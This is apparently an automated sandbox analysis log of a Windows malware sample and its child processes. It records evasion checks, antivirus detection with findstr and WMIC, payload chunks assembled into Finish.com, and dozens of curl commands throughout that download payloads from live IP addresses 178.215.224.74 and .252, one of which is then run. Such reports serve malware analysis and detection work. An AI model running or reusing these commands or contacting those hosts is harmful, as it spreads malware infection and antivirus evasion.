Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\303482\Either.pifJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_52-14547
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com TID: 2128Thread sleep time: -16380000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,52_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_004107A0 FindFirstFileA,52_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_004062D5 FindFirstFileW,FindClose,88_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_00402E18 FindFirstFileW,88_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,88_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768032Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768032\Jump to behavior
Source: curl.exe, 00000031.00000003.2784647329.0000000002D31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77A
Source: curl.exe, 00000018.00000003.2545162631.0000000002831000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000025.00000003.2668520821.0000000003542000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002B.00000003.2717621741.0000000002841000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002E.00000003.2734328426.0000000002BC1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003A.00000003.2827834731.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000048.00000003.2929488178.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005B.00000003.3090191494.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000063.00000003.3131480100.00000000034C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: curl.exe, 00000042.00000003.2874731169.0000000002EC1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000042.00000002.2876030793.0000000002EC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: curl.exe, 00000028.00000003.2693793870.00000000031E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77l'
Source: curl.exe, 0000001C.00000002.2618466664.00000000034D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004B.00000002.2945763230.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004E.00000003.2962294058.0000000002A11000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000003.2978571809.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000054.00000002.3000425346.0000000003029000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000057.00000003.3058248022.0000000002E51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_004125F0 LeaveCriticalSection,CreateFileA,EnterCriticalSection,CreateFileA,GetKernelObjectSecurity,GetKernelObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,GetKernelObjectSecurity,SetKernelObjectSecurity,GetProcessHeap,HeapFree,CloseHandle,CreateFileA,CloseHandle,52_2_004125F0
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican GJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com GJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
